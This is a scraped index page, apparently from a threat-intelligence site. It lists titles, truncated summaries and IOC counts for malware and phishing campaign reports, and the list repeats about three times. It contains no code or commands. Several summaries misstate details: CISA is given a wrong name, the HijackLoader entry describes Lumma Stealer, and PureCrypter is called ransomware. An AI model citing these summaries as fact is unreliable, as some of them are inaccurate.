The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
